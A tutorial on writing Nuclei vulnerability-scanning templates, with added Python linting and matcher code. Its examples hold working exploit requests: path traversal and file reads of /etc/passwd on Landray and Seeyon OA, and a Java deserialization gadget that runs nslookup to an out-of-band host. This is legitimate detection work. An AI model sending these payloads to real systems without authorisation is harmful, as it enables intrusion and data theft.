
1. Syntax format of scripts

Case sensitivity: YAML keys and values are case-sensitive.

Indentation: indentation expresses the hierarchy. YAML indents with spaces (tabs are not allowed), usually two spaces per level.

Key-value pairs: YAML stores data as key-value pairs, with key and value separated by a colon (:).

Lists: list items are introduced with a hyphen (-).

Comments: lines starting with # are comments.

Strings: strings may be written unquoted, single-quoted or double-quoted.

id: the unique identifier of the template. It may not contain Chinese characters, special characters, "--" or spaces. Think of the id as the title of the output line: a short, readable id lets you recognise a hit faster.

info: the information block. name, author, severity, description, reference and tags all belong to it. In general you only need to write name, author, severity, description and tags.

name: the template name; it is recommended to keep it the same as the id.

severity: the severity level. Chinese cannot be used here; critical, high, medium and info are commonly used to indicate the threat level.

description: an introduction to the vulnerability. Chinese may be used here and special characters are not restricted. It is the place to explain what the template actually tests, so that users understand the specific vulnerability.

tags: tags attach a label to the vulnerability so that templates can be selected for scanning by tag, for example tags: seeyon (do not use Chinese in tags).
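As an added example (not part of the original post), the following Python linter checks a parsed template against the id and info rules listed above: an ASCII-only id without spaces or "--", the required info fields, and the allowed severity values. The sample templates are constructed here in the dictionary form a YAML parser returns; lint_template_file assumes PyYAML is installed.

```python
import re

# Severity values accepted by nuclei (the same list appears in the script example below).
ALLOWED_SEVERITIES = {"info", "low", "medium", "high", "critical", "unknown"}
# Fields the post says you should always write in the info block.
REQUIRED_INFO = ("name", "author", "severity", "description", "tags")
# An id may contain only ASCII letters, digits, '-' and '_'.
ID_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def has_non_ascii(value: str) -> bool:
    """True if the string contains Chinese or any other non-ASCII character."""
    return any(ord(ch) > 127 for ch in value)


def lint_template(doc: dict) -> list:
    """Check a parsed template (the dict PyYAML returns) and return a list of problems."""
    problems = []
    tid = doc.get("id")
    if not isinstance(tid, str) or not tid:
        problems.append("id is missing")
    else:
        if has_non_ascii(tid) or " " in tid or not ID_RE.match(tid):
            problems.append(f"id {tid!r} may only contain ASCII letters, digits, '-' and '_'")
        if "--" in tid:
            problems.append(f"id {tid!r} must not contain '--'")
    info = doc.get("info")
    if not isinstance(info, dict):
        problems.append("info block is missing")
        return problems
    for key in REQUIRED_INFO:
        if key not in info:
            problems.append(f"info.{key} is missing")
    severity = info.get("severity")
    if severity is not None and severity not in ALLOWED_SEVERITIES:
        problems.append(f"info.severity {severity!r} is not one of {sorted(ALLOWED_SEVERITIES)}")
    tags = info.get("tags")
    if isinstance(tags, str) and has_non_ascii(tags):
        problems.append("info.tags must not contain non-ASCII characters")
    return problems


def lint_template_file(path: str) -> list:
    """Parse a template file with PyYAML (assumed installed) and lint it."""
    import yaml  # imported here so the rest of the module works without PyYAML
    with open(path, encoding="utf-8") as fh:
        return lint_template(yaml.safe_load(fh))


# Constructed sample templates, already in the parsed form PyYAML would return.
GOOD_TEMPLATE = {
    "id": "landray-oa-fileread",
    "info": {"name": "landray-oa-fileread", "author": "backlion", "severity": "high",
             "description": "arbitrary file read", "tags": "fileread,landray"},
}
BAD_TEMPLATE = {
    "id": "文件读取 test--1",                          # Chinese characters, a space and '--'
    "info": {"name": "bad", "severity": "Critical"},  # wrong case, missing fields
}

if __name__ == "__main__":
    for label, doc in (("good", GOOD_TEMPLATE), ("bad", BAD_TEMPLATE)):
        print(label, lint_template(doc) or "ok")
```

Run it before nuclei -t test.yaml --validate: the validate flag catches YAML and schema errors, while this catches the naming conventions from the list above that nuclei itself does not enforce.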

I write nuclei's YAML scripts daily. Nuclei has a built-in cookie-reuse attribute. When multiple requests are initiated, the session needs to be maintained; you can add cookie-reuse: true to keep the session across multiple requests. This is useful when there is authentication.

If the match fails, you can use -debug to print the request and the response for debugging. Capture the request with Burp and paste the raw request contents directly into the template.

2. Common Nuclei commands

1. Verify template format

nuclei -t test.yaml --validate

2. Specify templates and targets

nuclei -t test.yaml -u http://exam.com

3. Batch scan

nuclei -t test.yaml -l target.txt

4. Specify socks5 proxy scanning

nuclei -t test.yaml -u http://exam.com -p socks5://127.0.0.1:7890

3. Script example

id: file-include                   # The unique identifier of the template

info:                              # Basic information about the template: name, author, severity, etc.
  name: file include               # The name of the script
  author: bakclion                 # Template author
  severity: high                   # Severity level. Options: info, low, medium, high, critical, unknown
  description: nuclei template for testing shooting range   # Description of the template
  reference: http://www.baidu.com  # Reference source
  tags: test                       # Category tags

requests:                          # Defines how to interact with the target
  - method: GET                    # HTTP method such as GET or POST
    path:                          # Requested path
      - '{{BaseURL}}/vul/dir/dir_list.php?title=././././././././etc/passwd'
    headers:                       # Request headers
      User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'
    matchers:
      - type: status               # Match the response status code
        status:
          - 200
      - type: regex                # Match the response content
        part: body
        regex:
          - 'root:x:0:0:root:/root:/bin/bash'

4. Script composition

1. Beginning

id: landray-oa-fileread

info:
  name: landray-oa-fileread
  author: backlion
  severity: high
  description: |
    Landray OA custom.jsp arbitrary file read vulnerability; this OA is encountered relatively rarely
    FOFA: app='Landray-OA system'
  reference: https://github.com/backslion
  tags: fileread,landray

2. Request

GET request

requests:
  - method: GET
    path:
      - '{{BaseURL}}/seeyon/webmail.do?method=doDownloadAttfilename=index.jspfilePath=./conf/datasourceCtp.properties'

POST request

requests:
  - method: POST
    path:
      - '{{BaseURL}}/sys/ui/extend/varkind/custom.jsp'
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "var={'body':{'file':'file:///etc/passwd'}}"

Raw request (a blank line separates the headers from the body, as in a real HTTP request)

requests:
  - raw:
      - |
        POST /spirit/interface/gateway.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        json={'url':'/general/././mysql5/my.ini'}

Redirects

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    redirects: true
    max-redirects: 2

or, for a raw request:

requests:
  - raw:
      - |
        GET /zentao/api-getModel-editor-save-filePath=bote HTTP/1.1
        Host: {{Hostname}}
    redirects: true
    max-redirects: 3

Path

The next part of the request is the path. Dynamic variables can be placed in a path to change its value at runtime. Variables are enclosed in {{ and }} and their names are case-sensitive.

{{Hostname}}: a commonly used reserved word for the host name, including the port when the target URL carries one.

{{randstr}}: a random string.

{{rand_int(1,9999)}}: a reserved function that generates a random integer between 1 and 9999.

{{BaseURL}}: the complete base URL, for example https://example.com:443/foo/bar.php.

{{RootURL}}: the base URL without path and file, such as https://example.com:443.

{{Host}}: the host name, such as example.com.

{{Port}}: the port number, for example 443.

{{Path}}: the path, such as /seeyon/login.

{{File}}: the file name, such as bar.php.

{{Scheme}}: the protocol, such as https.

{{hex_decode('...')}}: a reserved function that decodes a hex-encoded string.

md5('...'): a reserved function that returns the MD5 hash of its argument.

Variable       Value
{{BaseURL}}    https://example.com:443/foo/bar.php
{{RootURL}}    https://example.com:443
{{Hostname}}   example.com:443
{{Host}}       example.com
{{Port}}       443
{{Path}}       /foo
{{File}}       bar.php
{{Scheme}}     https
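To make the table concrete, here is an added Python example (my own code, not from the post or from nuclei) that derives these variables from a target URL and substitutes {{Name}} placeholders case-sensitively, so a misspelled {{baseurl}} is left in place rather than silently replaced. It goes slightly beyond the table by handling URLs without a port or path; the default-port rule (80 for http, 443 for https) and the empty Path/File for a bare host are my assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit, urlunsplit

# Matches {{Name}} placeholders; the name is captured exactly as written (case-sensitive).
PLACEHOLDER_RE = re.compile(r"\{\{([A-Za-z_][A-Za-z0-9_]*)\}\}")


def template_variables(url: str) -> dict:
    """Derive the built-in URL variables from the table above for one target URL."""
    u = urlsplit(url)
    scheme = u.scheme
    host = u.hostname or ""
    # Assumption: when the URL carries no port, the default for the scheme is used.
    port = str(u.port) if u.port else ("443" if scheme == "https" else "80")
    # Hostname keeps host:port exactly as written in the URL (any user:pass@ prefix dropped).
    hostname = u.netloc.rsplit("@", 1)[-1]
    return {
        "BaseURL": urlunsplit(u).rstrip("/"),
        "RootURL": f"{scheme}://{hostname}",
        "Hostname": hostname,
        "Host": host,
        "Port": port,
        "Path": posixpath.dirname(u.path),   # directory part, e.g. /foo
        "File": posixpath.basename(u.path),  # file part, e.g. bar.php
        "Scheme": scheme,
    }


def render(text: str, variables: dict) -> str:
    """Substitute {{Name}} placeholders case-sensitively. Unknown names, and the
    runtime placeholders such as {{randstr}} or {{interactsh-url}} that nuclei fills
    itself, are left untouched."""
    return PLACEHOLDER_RE.sub(lambda m: str(variables.get(m.group(1), m.group(0))), text)


if __name__ == "__main__":
    # Constructed target URLs: the one from the table and the one from the command examples.
    for target in ("https://example.com:443/foo/bar.php", "http://exam.com"):
        v = template_variables(target)
        print(target, v)
        print(render("{{BaseURL}}/login on {{Hostname}} ({{baseurl}} stays)", v))
```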

stop-at-first-match

The general idea is that a template may contain several scan paths. When the first one hits, scanning of the remaining paths in that request block stops automatically. This does not affect other templates.

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
      - '{{BaseURL}}/login'
      - '{{BaseURL}}/main'
      - '{{BaseURL}}/index'
    stop-at-first-match: true

OOB

Since Nuclei v2.3.6, Nuclei has built-in, automatic request correlation with the interact.sh API for OOB-based vulnerability scanning. It is as simple as writing {{interactsh-url}} anywhere in the request and adding a matcher on interactsh_protocol. Nuclei handles the correlation of the interactions with the templates and with the requests that generated them, which makes OOB scans easy.

requests:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

Java deserialization

requests:
  - raw:
      - |
        POST /index.faces;jsessionid=x HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Length: 1882
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        javax.faces.ViewState={{generate_java_gadget('commons_collection3.1', 'nslookup {{interactsh-url}}', 'base64')}}

3. Matcher

matchers-condition: and  # Logical combination of the results of multiple matchers: and|or. and = all must match
matchers:
  - type: dsl            # Matcher type: status|word|size|binary|regex|dsl
    dsl:                 # DSL expressions (more flexible, for complex matching; recommended). StringSlice
      - 'status_code_1 == 200 && status_code_2 == 302'
      - 'all_headers_1 == "admin" && all_headers_2 == "index"'
    condition: and       # Both expressions above must hold
  - type: word
    words:               # Text to look for in the response (note: the word type uses the key words). StringSlice
      - 'admin.php'
      - '61646d696e2e706870'
      - '{{match_str}}'
    encoding: hex        # Encoder: hex-encodes the returned data before matching the words (only the word matcher supports it, and only hex)
    # The following settings are common to all matcher types except dsl
    part: header         # Which part of the response to read: header|body (no setting = the whole response)|interactsh_protocol|interactsh_request (data returned by the dnslog server; requires {{interactsh-url}} in the request)
    condition: or        # Logical combination of this matcher's entries: and|or
    negative: true       # Inverts the matching result; combined with condition this gives flexible combinations. true|false
  - type: status
    status:              # Response status codes to match. intSlice, e.g. 200 or 302
      - 200
  - type: regex
    regex:               # Regular expressions to match. StringSlice
      - '.*admin\.php.*'
  - type: binary
    binary:              # Hex-encoded byte sequences to match. StringSlice
      - '61646d696e2e706870'
  - type: size
    size:                # Response size to match (note: refers to the body). intSlice
      - 1234

dsl is generally used for complex logical judgments and provides the following built-in variables (a suffix _1, _2, ... selects the response of the first, second, ... request):

Variable        Description                                                          Example         Output
content_length  Content length (Content-Length header)                               content_length  12345
status_code     Response status code                                                 status_code     200
all_headers     All response headers                                                 all_headers
body            Response body                                                        body_1
header_name     Value of a response header; name lowercased, with - replaced by _    user_agent      xxxx
header_name     Value of a response header; name lowercased, with - replaced by _    set_cookie      xxx=
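To show how the matcher block and the dsl variables above fit together, here is an added Python example (my own code, not the post's and not nuclei's implementation) that evaluates the status, word, regex, binary and size matchers with part, condition, negative and matchers-condition over a constructed response, and builds the dsl variable set (plain and _1-suffixed names, header names lowercased with - replaced by _). The Response model and the sample response are constructed for the example; dsl expressions themselves are not evaluated.

```python
import re
from dataclasses import dataclass


@dataclass
class Response:
    """Minimal model of one HTTP response (constructed for this example)."""
    status_code: int
    headers: dict
    body: str

    def header_text(self) -> str:
        return "\n".join(f"{k}: {v}" for k, v in self.headers.items())


def select_part(resp: Response, part) -> str:
    """part: header | body | None (no setting = the whole response)."""
    if part == "header":
        return resp.header_text()
    if part == "body":
        return resp.body
    return resp.header_text() + "\n\n" + resp.body


def combine(results, condition: str) -> bool:
    """condition and|or over the per-entry results of one matcher (nuclei default: or)."""
    return all(results) if condition == "and" else any(results)


def run_matcher(m: dict, resp: Response) -> bool:
    """Evaluate one matcher entry (status, size, word, regex, binary) against a response."""
    mtype = m["type"]
    condition = m.get("condition", "or")
    data = select_part(resp, m.get("part"))
    if mtype == "status":
        hit = resp.status_code in m["status"]
    elif mtype == "size":
        hit = len(resp.body.encode()) in m["size"]            # size refers to the body
    elif mtype == "word":
        # encoding: hex compares hex-encoded response data against hex-encoded words
        haystack = data.encode().hex() if m.get("encoding") == "hex" else data
        hit = combine([w in haystack for w in m["words"]], condition)
    elif mtype == "regex":
        hit = combine([re.search(r, data) is not None for r in m["regex"]], condition)
    elif mtype == "binary":
        hit = combine([bytes.fromhex(h) in data.encode() for h in m["binary"]], condition)
    elif mtype == "dsl":
        raise NotImplementedError("dsl expressions are not evaluated in this example")
    else:
        raise ValueError(f"unknown matcher type {mtype!r}")
    return not hit if m.get("negative") else hit             # negative inverts the result


def run_matchers(block: dict, resp: Response) -> bool:
    """Combine all matchers of a request with matchers-condition (and|or)."""
    results = [run_matcher(m, resp) for m in block["matchers"]]
    return combine(results, block.get("matchers-condition", "or"))


def dsl_variables(resp: Response, index: int = 1) -> dict:
    """Build the variables a dsl expression can use for the index-th response: the plain
    names plus their _1, _2, ... suffixed copies (status_code_1, body_2, ...)."""
    v = {
        "status_code": resp.status_code,
        "content_length": int(resp.headers.get("Content-Length", len(resp.body.encode()))),
        "all_headers": resp.header_text(),
        "body": resp.body,
    }
    for name, value in resp.headers.items():
        v.setdefault(name.lower().replace("-", "_"), value)   # Set-Cookie -> set_cookie
    return {**v, **{f"{k}_{index}": val for k, val in v.items()}}


# Constructed sample response (30-byte body).
SAMPLE = Response(200, {"Content-Type": "text/html", "Set-Cookie": "PHPSESSID=abc123"},
                  "<a href='/admin.php'>admin</a>")

# The non-dsl matchers from the block above, in their parsed form.
PAGE_MATCHERS = {
    "matchers-condition": "and",
    "matchers": [
        {"type": "word", "words": ["admin.php", "61646d696e2e706870", "{{match_str}}"],
         "encoding": "hex", "part": "header", "condition": "or", "negative": True},
        {"type": "status", "status": [200]},
        {"type": "regex", "regex": [r".*admin\.php.*"]},
        {"type": "binary", "binary": ["61646d696e2e706870"]},
        {"type": "size", "size": [1234]},
    ],
}

if __name__ == "__main__":
    print([run_matcher(m, SAMPLE) for m in PAGE_MATCHERS["matchers"]])
    print(run_matchers(PAGE_MATCHERS, SAMPLE))  # the size matcher fails, so "and" gives False
    print(dsl_variables(SAMPLE)["set_cookie"])
```

Running it against the sample shows why matchers-condition matters: four of the five matchers hit, but the size matcher does not, so the block as written (and) reports no match, while the same block with matchers-condition: or would report one. Walking the matchers one by one like this is the quickest way to find out which entry is responsible when -debug shows the expected response but the template stays silent.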
